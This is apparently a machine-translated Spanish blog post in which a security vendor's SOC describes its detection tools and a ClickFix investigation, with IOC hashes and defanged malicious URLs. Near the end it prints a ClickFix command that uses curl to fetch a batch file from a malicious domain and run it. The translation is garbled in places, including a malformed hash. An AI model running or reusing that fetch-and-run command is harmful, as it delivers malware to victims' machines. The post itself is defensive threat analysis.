Un cinturón de herramientas SOC para mantener el ritmo de las amenazas en rápida evolución y los tiempos decrecientes de los atacantes, el equipo de operaciones de seguridad LevelBlue aprovecha múltiples herramientas y asociaciones clave para acortar el tiempo entre la detección y la respuesta. A continuación se presentan algunos ejemplos de las herramientas utilizadas por nuestro SOC y algunas de las circunstancias en las que se utilizaría cada herramienta. Una asociación con Sentinelone a través de la seguridad de punto final administrada de LevelBlue con Sentinelone, nuestro SOC ha proporcionado un valor excepcional con una mayor protección y visibilidad de punto final a nuestros clientes. El SOC pudo reducir en gran medida el tiempo entre la detección y la respuesta con las alarmas STAR (respuesta activa de la historia) dentro de Sentinelone. Estas alarmas estelares son construidas a medida por nuestro equipo y están informadas por detecciones proactivas de nuestros cazadores de amenazas en torno a amenazas recientes y TTP (técnicas, tácticas y procedimientos). Al utilizar informes de inteligencia de amenazas y datos en cuestión, nuestro equipo pudo realizar una revisión más profunda sobre los TTP de amenazas recientes. Esto permitió la creación de reglas personalizadas para detectar más rápidamente los COI (indicadores de compromiso) dentro de los entornos de nuestros clientes. Nuestro equipo de inteligencia de amenazas de LevelBlue Labs también utilizó esta información para crear nuevas reglas en USM en cualquier lugar, nuestra plataforma Open XDR. Como socio de seguridad de confianza, LevelBlue siempre se esfuerza por mejorar nuestros tiempos de detección y respuesta para aumentar el valor y proporcionar un apoyo más proactivo a nuestros clientes. Estas herramientas son vitales para que podamos mejorar los tiempos de respuesta y evitar que las amenazas afecten a nuestros clientes. Bundling Seguridad de punto final administrado y detección y respuesta de amenazas administradas es una excelente opción para los clientes que carecen de ingestión de datos desde los puntos finales en USMA y desean una mejor visibilidad. El paquete también beneficia a los clientes que buscan equilibrar el costo de los socios de seguridad de terceros con los costos de las herramientas de monitoreo adicionales. En lugar de comprar múltiples herramientas para llevar datos potencialmente ruidosos a la USMA, Bundling proporciona una visibilidad integral en sus puntos finales junto con el monitoreo 24/7 que es parte de nuestra oferta administrada de detección de amenazas y respuesta. Intercambio de amenazas abiertas (OTX) El Lablue Labs Open Amenic Exchange (OTX) es otra herramienta integral de la que dependen nuestros analistas durante el triaje e investigación de alarma. Esta plataforma es una de las comunidades de inteligencia de amenazas más grandes con más de 330k+ miembros en todo el mundo. LevelBlue Labs actualiza continuamente OTX, y la inteligencia de amenazas de OTX se integra perfectamente en la plataforma USMA de LevelBlue. Los entornos de nuestros clientes están escaneados para los partidos de pulso OTX y los COI. Si se descubre un indicador de un pulso al cliente en su entorno, se genera una alarma. Al examinar una alarma en USMA, los analistas están dirigidos al pulso asociado. El analista puede usar los COI adicionales asociados con ese pulso para promover su investigación. La centralización de esta información en USMA ayuda a nuestros analistas a racionalizar el triaaje de incidentes y estos pulsos se pueden comparar con otra inteligencia de código abierto (OSINT) para dar a los analistas más contexto en su investigación. Los analistas también pueden usar la ID de pulso OTX directamente dentro de USMA para consultar el entorno de los clientes para cualquier COI adicional asociado con la amenaza que se está investigando. Figura 1: Búsqueda de eventos de instancia del cliente utilizando reglas de estrella de ID de OTX El SoC LevelBlue también ha creado un sistema de alerta personalizado basado en métodos de detección de alta fidelidad que ha aumentado los tiempos de respuesta al brindar estas alertas a la vanguardia de la atención de nuestros analistas. Estos métodos de alta fidelidad, ya sea relacionados con las reglas de estrella personalizadas o las detecciones de compromiso del usuario, son solo otro ejemplo del trabajo proactivo que hace nuestro equipo SOC para mejorar el valor para nuestros clientes. Las Reglas de Star de Sentinelone han demostrado ser una adición invaluable al conjunto de herramientas de detección ya utilizados por el Soc MDR. Cuando se detecta una amenaza y se ha planteado una alarma, un analista de SOC utilizará diferentes herramientas para analizar la amenaza y sus artefactos relacionados. El SOC LevelBlue investiga: ClickFix ClickFix es una campaña de ingeniería social que explota la apariencia de legitimidad para engañar a las víctimas para ejecutar guiones maliciosos. En la siguiente investigación, el SOC utilizó varias herramientas, incluidas las sandbox de Joe, la visibilidad profunda de Sentinelone y la lista de bloques Sentinelone para analizar un ataque de clickFix. La investigación comenzó cuando el SOC recibió una alarma para una línea de comando que es indicativa de malware ClickFix (ver Figura 2). Figura 2: Alarma ClickFix En USMA La línea de comando que se muestra arriba permitió a nuestro equipo obtener el archivo y la información de ese archivo. Con esto, nuestro equipo podría buscar en nuestra base de clientes para determinar si el archivo existía en cualquier otro entorno y agregar los hashs de archivo a nuestra lista de bloques Global Sentinelone. Para revisar esta línea de comando, el SOC generalmente utilizaría un servicio de sandbox en línea como Sandbox de Joe o Anyrun. Joe’s Sandbox es preferible en caso de que haya datos de clientes presentes, porque se ejecuta en un inquilino privado. AnyRun también es una herramienta poderosa, pero su servicio gratuito no es privado y se usa solo si se confirma que no se contienen datos del cliente. Después de ejecutar la línea de comando anterior en Joe’s Sandbox, recibimos un informe de actividad en profundidad (ver Figura 3 a continuación). Figura 3: Línea de comando inicial ejecutada en el ataque de ClickFix después de ejecutar el comando en Joe’s Sandbox, nada apareció en el frente, pero obtuvimos una lista de archivos sospechosos en el informe que se generó (ver Figura 4 a continuación). Figura 4: Lista de archivos sospechosos del informe Sandbox de Joe del archivo. Pudimos recuperar los hashes SHA1 y buscar un compromiso potencial en los entornos de nuestros clientes agrupados. Usando la visibilidad profunda de Sentinelone, nuestro equipo de SOC escribió una consulta simple buscando en los campos de hash de archivo para cualquiera de los hashes obtenidos en nuestro informe: #Hash contiene («A48C95DF3D802FFB6E5ECADA542CC5E028192F2B», «7EC84BE84FE23F0B0093B647538737E1F19EBB03», «C2E5ea8AFCD46694448D812D1FFCD02D1F594022», «3D1999BEE412CBAC0A6D2C4C9FD5509AT12227INE. «98DD757E1C1FA8B5605BDA892AA0B82EBEFA1F07», «01873977C871D3346D795CF7E38888685DE9F0B16»,, «C4E27A43075CE993FF6BB033360AF386B2FC58FF», «906F7E94F841D464D4DA144F7C858FA2160E36DB», «, «A556209655DCB5E939FD404F57D199F2BB6DA9B3», «AD464EB7CF5C19C8A443AB5B590440B32DBC618F») Ejecutando esta consulta mostró US 5 detecciones de un incidente que ocurrió una semana antes en un entorno de diferentes clientes (vea la figura de diferentes clientes (vea la figura 5 a continuación. Figura 5: Detecciones de consultas que buscan hash obtenidos en el informe Nuestro equipo también utilizó la función de lista de bloques de Sentinelone para agregar estos hashes a Blocklist a nivel de alcance global para garantizar que el archivo se mate y se ponga en cuarentena si se detecta en un entorno de cliente (ver Figura 6). Figura 6: Agregar el hash SHA1 de NetSupport Rat a Sentinelone Global Blocklist Al realizar un análisis estático de un sitio web o un enlace de phishing potencial, nuestros analistas normalmente utilizarán un servicio que visita el sitio y proporciona una captura de pantalla de la página, junto con información que incluye el código fuente de la página, redireccionamientos, scripts y cualquier imagen. En el siguiente escenario, nuestro equipo recibió una alarma para una solicitud de DNS a un dominio sospechoso que se incluye en nuestros pulsos OTX (Figura 7). Figura 7: Alarma OTX En USMA para el sitio web comprometido responsable del ataque de ClickFix al revisión inicial, el dominio parecía pertenecer a un sitio web de viajes normal. Luego, nuestro equipo inspeccionó el tráfico de red desde el escaneo del sitio web en la pestaña HTTP a continuación y buscó cualquier redirección que ocurriera durante el escaneo en la pestaña Redireccionamientos (ver Figura 8). Figura 8: escaneo de URL del sitio comprometido Islonline[.]org en la pestaña HTTP, nuestro equipo vio que un archivo titulado J.JS alojado en el sitio navegado al sitio Hxxps[://]lang3666[.]TOP/LV/XFA[.]. Figura 9: Redirigir al archivo JS sospechoso y el dominio .TOP al ejecutar un escaneo de URL, nuestros analistas pudieron recuperar el código fuente del archivo JS: Figura 10: Código fuente del archivo JS alojado en el dominio .TOP Revisión adicional del archivo reveló un script ofuscanado que se usa para determinar si el agente de usuarios es un teléfono móvil o escritorio. El script luego genera un identificador de 8 dígitos que luego se adjunta a la URL HXXPS[://]lang3666[.]superior/lv/índice[.]PHP?. Esto da como resultado descargar otro script para obtener la carga útil final. Los ataques de clickFix a menudo siguen esta cadena de eventos y dan como resultado un comando similar al que se muestra a continuación: cmd.exe/c curl.exe -k -ss -x post https: // pravaix[.]superior/lv/lll[.]php -o «c: \ users \ public \ jkdfgf.bat» && start /min “” c: \ users \ public \ jkdfgf.bat Conclusión Como se ve en la investigación de ClickFix anterior, las integraciones de USM Anywhere permiten que el SoC LevelBlue reduzca en gran medida el tiempo entre la detección y la respuesta. Puede leer más sobre ClickFix y las recomendaciones de LevelBlue SoC para proteger sus entornos en el informe de las tendencias de amenaza de LevelBlue, Foot Me Once: cómo los cibercriminales están dominando el arte del engaño. El contenido proporcionado en este documento es solo para fines informativos generales y no debe interpretarse como asesoramiento legal, regulatorio, de cumplimiento o ciberseguridad. Las organizaciones deben consultar a sus propios profesionales legales, de cumplimiento o ciberseguridad sobre obligaciones específicas y estrategias de gestión de riesgos. Si bien las soluciones de detección y respuesta de amenazas administradas de LevelBlue están diseñadas para respaldar la detección y respuesta de amenazas en el nivel de punto final, no son un sustituto para el monitoreo integral de la red, la gestión de vulnerabilidades o un programa completo de seguridad cibernética.